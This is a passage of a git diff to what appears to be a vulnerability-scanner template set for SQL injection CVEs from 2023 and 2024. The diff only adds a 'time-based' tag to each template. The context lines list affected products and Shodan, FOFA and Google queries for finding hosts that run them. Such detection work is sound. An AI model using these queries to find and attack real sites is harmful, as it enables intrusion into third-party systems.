time-based,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index d62b8d443c..01358f2b22 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/video-list-manager/ fofa-query: body=/wp-content/plugins/video-list-manager/ publicwww-query: /wp-content/plugins/video-list-manager/ - tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project + tags: time-based,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project http: - raw: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index fcc7040049..bcf0192be4 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -28,7 +28,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth + tags: time-based,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth http: - raw: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 6056d6df45..8ee1ca8409 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project + tags: time-based,cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 9c9afb6f06..821ca78714 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios + tags: time-based,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: - raw: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 3238ae18db..a983c62260 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -30,7 +30,7 @@ info: vendor: sandhillsdev product: easy_digital_downloads framework: wordpress - tags: cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev + tags: time-based,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev http: - raw: diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 56fdaaaecf..119c1d8d5e 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -24,7 +24,7 @@ info: product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate + tags: time-based,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate http: - raw: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 1c43b95c37..beec74393e 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -29,7 +29,7 @@ info: vendor: joommasters product: jms_blog framework: prestashop - tags: cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters + tags: time-based,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 4b9cc991fe..6b1df7cc96 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/xipblog" fofa-query: app="Prestashop" - tags: cve,cve2023,prestashop,sqli,xipblog + tags: time-based,cve,cve2023,prestashop,sqli,xipblog flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 77b6da0e2a..77078b1491 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen + tags: time-based,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 81aa17dc39..89dd0742b0 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"Prestashop" - http.component:"prestashop" - tags: cve2023,cve,prestashop,sqli,leotheme + tags: time-based,cve2023,cve,prestashop,sqli,leotheme http: - raw: diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 8af1e6891f..2ace47fb43 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -29,7 +29,7 @@ info: publicwww-query: "/wp-content/plugins/mstore-api/" shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ - tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui + tags: time-based,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 6660a05ef1..1a8035c6bc 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: cve2023,cve,sqli,bloofox,authenticated + tags: time-based,cve2023,cve,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 3de67af58d..5b043d0923 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: cve,cve2023,sqli,bloofox,authenticated + tags: time-based,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 060fa03f11..7f5f52b00a 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: cve,cve2023,sqli,bloofox,authenticated + tags: time-based,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34754.yaml b/http/cves/2023/CVE-2023-34754.yaml index fec5916067..2c488596c8 100644 --- a/http/cves/2023/CVE-2023-34754.yaml +++ b/http/cves/2023/CVE-2023-34754.yaml @@ -26,7 +26,7 @@ info: verified: true vendor: bloofox product: bloofoxcms - tags: cve,cve2023,bloofox,sqli,authenticated + tags: time-based,cve,cve2023,bloofox,sqli,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 8f7c709f6b..54d90265f6 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: cve,cve2023,sqli,bloofox,authenticated + tags: time-based,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 0f0b45fc1e..0a69d87c04 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: cve,cve2023,sqli,bloofox,authenticated + tags: time-based,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 4cbd3f2e93..9e55c66836 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -29,7 +29,7 @@ info: fofa-query: - "title=\"QloApps\"" - title="qloapps" - tags: cve,cve2023,qloapps,sqli,webkul + tags: time-based,cve,cve2023,qloapps,sqli,webkul flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 3ce5c7f525..6d2b4ecce7 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve2023,cve,cacti,sqli + tags: time-based,cve2023,cve,cacti,sqli http: - raw: diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index db4be9a9a9..610de931af 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -23,7 +23,7 @@ info: verified: true framework: prestashop shodan-query: html:"/tvcmsblog" - tags: cve,cve2023,prestashop,sqli,tvcmsblog + tags: time-based,cve,cve2023,prestashop,sqli,tvcmsblog http: - raw: diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index fc0d426099..9cc3f5b905 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: wbce product: wbce_cms - tags: cve,cve2023,sqli,wbce,intrusive + tags: time-based,cve,cve2023,sqli,wbce,intrusive http: - raw: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 457caf0f3c..b9df11b85e 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -34,7 +34,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid + tags: time-based,cve,cve2023,hoteldruid,cms,sqli,digitaldruid flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 4f4adf06c9..3367d97fc7 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -23,7 +23,7 @@ info: product: pireospay framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: cve,cve2023,sqli,prestashop,pireospay,01generator + tags: time-based,cve,cve2023,sqli,prestashop,pireospay,01generator flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 11c56aa8e3..b4b51bdd3d 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign + tags: time-based,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign http: - raw: diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index b4790aa481..2e8fe811a6 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -34,7 +34,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios + tags: time-based,cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 696a10e377..69867467fb 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -29,7 +29,7 @@ info: - html:"Academy LMS" - http.html:"academy lms" fofa-query: body="academy lms" - tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem + tags: time-based,cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: - raw: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 6f57adadde..95777bc871 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -29,7 +29,7 @@ info: shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" publicwww-query: "/wp-content/plugins/wp-fastest-cache/" - tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache + tags: time-based,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache flow: | if (http(1)) { for (let i = 0; i < 2; i++) { diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 7f3321d876..cad1da1aa3 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress + tags: time-based,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - raw: diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index cc63af51a8..9cf3c01a58 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins + tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - raw: diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 52178ca728..d28c323a36 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -30,7 +30,7 @@ info: zoomeye-query: app:"WordPress Ultimate Member Plugin" product: ultimate_member vendor: ultimatemember - tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli + tags: time-based,cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index db78801456..c0e1bc3e9c 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -25,7 +25,7 @@ info: product: masterstudy_lms framework: wordpress fofa-query: body="wp-content/plugins/masterstudy-lms-learning-management-system/" - tags: cve,cve2024,sqli,wp-plugin,wordpress + tags: time-based,cve,cve2024,sqli,wp-plugin,wordpress http: - raw: diff --git a/http/cves/2024/CVE-2024-1698.yaml b/http/cves/2024/CVE-2024-1698.yaml index 2db6a5063f..2086b636e4 100644 --- a/http/cves/2024/CVE-2024-1698.yaml +++ b/http/cves/2024/CVE-2024-1698.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="/wp-content/plugins/notificationx" product: notificationx vendor: wpdeveloper - tags: cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli + tags: time-based,cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index 72b9d76447..821bd10030 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 fofa-query: body="app/structure/departments.php" || app="指挄调ćșŠçźĄç†ćčłć°" - tags: cve,cve2024,sqli,fujian,rce + tags: time-based,cve,cve2024,sqli,fujian,rce http: - raw: diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index bf14bf8963..090e13fced 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -25,7 +25,7 @@ info: verified: true max-request: 1 publicwww-query: "wp-content/plugins/wp-automatic" - tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic + tags: time-based,cve,cve2024,sqli,wordpress,wpscan,wp-automatic http: - raw: diff --git a/http/cves/2024/CVE-2024-2876.yaml b/http/cves/2024/CVE-2024-2876.yaml index 2f877347a2..ad04da61ec 100644 --- a/http/cves/2024/CVE-2024-2876.yaml +++ b/http/cves/2024/CVE-2024-2876.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/email-subscribers/" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan + tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan http: - raw: diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 05ffbf675b..703662cf31 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -28,7 +28,7 @@ info: product: layerslider framework: wordpress publicwww-query: "/wp-content/plugins/LayerSlider/" - tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli + tags: time-based,cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 1e03a14f8f..fd3ae7d78e 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -18,7 +18,7 @@ info: vendor: salephpscripts product: web_directory_free publicwww-query: "/wp-content/plugins/web-directory-free" - tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free + tags: time-based,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index aa9c3b111b..06f6a29c25 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -24,7 +24,7 @@ info: product: suitecrm shodan-query: title:"SuiteCRM" fofa-query: title="SuiteCRM" - tags: cve,cve2024,suitecrm,sqli + tags: time-based,cve,cve2024,suitecrm,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 52c11e7457..95428a3246 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/productsalert" fofa-query: body="/productsalert" - tags: cve,cve2023,prestashop,sqli,productsalert + tags: time-based,cve,cve2023,prestashop,sqli,productsalert flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 8ecf01486e..07147e2f37 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -21,7 +21,7 @@ info: vendor: wedevs product: dokan publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli + tags: time-based,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 8864160a83..0c090fb037 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: app="LANWON-䞎ćșŠæ”è§ˆçł»ç»Ÿ" - tags: cve,cve2024,sqli,blunet + tags: time-based,cve,cve2024,sqli,blunet flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml index 666440d967..5db439ab70 100644 --- a/http/cves/2024/CVE-2024-4295.yaml +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -29,7 +29,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/email-subscribers/" fofa-query: body="/wp-content/plugins/email-subscribers/" - tags: cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli + tags: time-based,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli variables: contact_id: "{{contact_id}}" diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml index 1d854f398b..3a93f0fde4 100644 --- a/http/cves/2024/CVE-2024-43917.yaml +++ b/http/cves/2024/CVE-2024-43917.yaml @@ -26,7 +26,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/" publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/" - tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli + tags: time-based,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index 5d3a0d684d..13b63b1f36 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/business-directory-plugin/" product: business_directory vendor: businessdirectoryplugin - tags: cve,cve2024,sqli,business-directory,wordpress,wp-plugin + tags: time-based,cve,cve2024,sqli,business-directory,wordpress,wp-plugin http: - raw: diff --git a/http/cves/2024/CVE-2024-5765.yaml b/http/cves/2024/CVE-2024-5765.yaml index a2de09f2a0..3f439e1897 100644 --- a/http/cves/2024/CVE-2024-5765.yaml +++ b/http/cves/2024/CVE-2024-5765.yaml @@ -17,7 +17,7 @@ info: max-request: 2 verified: true fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header" - tags: cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth + tags: time-based,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5975.yaml b/http/cves/2024/CVE-2024-5975.yaml index 4d7aacf0be..311e8778cc 100644 --- a/http/cves/2024/CVE-2024-5975.yaml +++ b/http/cves/2024/CVE-2024-5975.yaml @@ -21,7 +21,7 @@ info: product: cz-loan-management framework: wordpress publicwww-query: "/wp-content/plugins/cz-loan-management" - tags: cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management + tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index bc7fa6efc6..2af99dc66f 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -22,7 +22,7 @@ info: publicwww-query: "/wp-content/plugins/quiz-maker/" product: quiz_maker vendor: ays-pro - tags: cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli + tags: time-based,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-6159.yaml b/http/cves/2024/CVE-2024-6159.yaml index ba56bf995d..5b8425ef2b 100644 --- a/http/cves/2024/CVE-2024-6159.yaml +++ b/http/cves/2024/CVE-2024-6159.yaml @@ -18,7 +18,7 @@ info: max-request: 2 framework: wordpress publicwww-query: "/wp-content/plugins/push-notification-for-post-and-buddypress" - tags: cve,cve2024,wpscan,wp-plugin,wordpress,push-notification + tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,push-notification flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 5f06659d06..4052d6731a 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -24,7 +24,7 @@ info: product: payplus-payment-gateway framework: wordpress publicwww-query: "/wp-content/plugins/payplus-payment-gateway" - tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment + tags: time-based,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment http: - raw: diff --git a/http/cves/2024/CVE-2024-6924.yaml b/http/cves/2024/CVE-2024-6924.yaml index 1eccf7793e..aa0b72e06b 100644 --- a/http/cves/2024/CVE-2024-6924.yaml +++ b/http/cves/2024/CVE-2024-6924.yaml @@ -14,7 +14,7 @@ info: product: truebooker framework: wordpress publicwww-query: "/wp-content/plugins/truebooker-appointment-booking" - tags: wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker + tags: time-based,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index 444b56d600..dfda870be4 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -21,7 +21,7 @@ info: product: viral-signup framework: wordpress publicwww-query: "/wp-content/plugins/viral-signup" - tags: cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup + tags: time-based,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6928.yaml b/http/cves/2024/CVE-2024-6928.yaml index 5fd7b6d4de..c05729ebcd 100644 --- a/http/cves/2024/CVE-2024-6928.yaml +++ b/http/cves/2024/CVE-2024-6928.yaml @@ -20,7 +20,7 @@ info: product: opti-marketing framework: wordpress publicwww-query: "/wp-content/plugins/opti-marketing" - tags: cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli + tags: time-based,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml index 5a2ff4756f..e0b0e1a8a1 100644 --- a/http/cves/2024/CVE-2024-7188.yaml +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -25,7 +25,7 @@ info: product: quicklancer shodan-query: http.favicon.hash:1099370896 fofa-query: icon_hash="1099370896" - tags: cve,cve2024,sqli,quicklancer + tags: time-based,cve,cve2024,sqli,quicklancer http: - raw: diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml index 975acf0c61..726b654049 100644 --- a/http/cves/2024/CVE-2024-7854.yaml +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -25,7 +25,7 @@ info: product: woo_inquiry framework: wordpress publicwww-query: "/wp-content/plugins/woo-inquiry" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry + tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8484.yaml b/http/cves/2024/CVE-2024-8484.yaml index f4fd5de3b0..e171eb8cab 100644 --- a/http/cves/2024/CVE-2024-8484.yaml +++ b/http/cves/2024/CVE-2024-8484.yaml @@ -26,7 +26,7 @@ info: product: rest-api-to-miniprogram framework: wordpress publicwww-query: "/wp-content/plugins/rest-api-to-miniprogram" - tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram + tags: time-based,cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8503.yaml b/http/cves/2024/CVE-2024-8503.yaml index e82b494223..fdb6fd5d19 100644 --- a/http/cves/2024/CVE-2024-8503.yaml +++ b/http/cves/2024/CVE-2024-8503.yaml @@ -23,7 +23,7 @@ info: vendor: vicidial product: vicidial fofa-query: icon_hash="1375401192" - tags: cve,cve2024,vicidial,sqli + tags: time-based,cve,cve2024,vicidial,sqli flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8522.yaml b/http/cves/2024/CVE-2024-8522.yaml index e1c1c60537..33fd461494 100644 --- a/http/cves/2024/CVE-2024-8522.yaml +++ b/http/cves/2024/CVE-2024-8522.yaml @@ 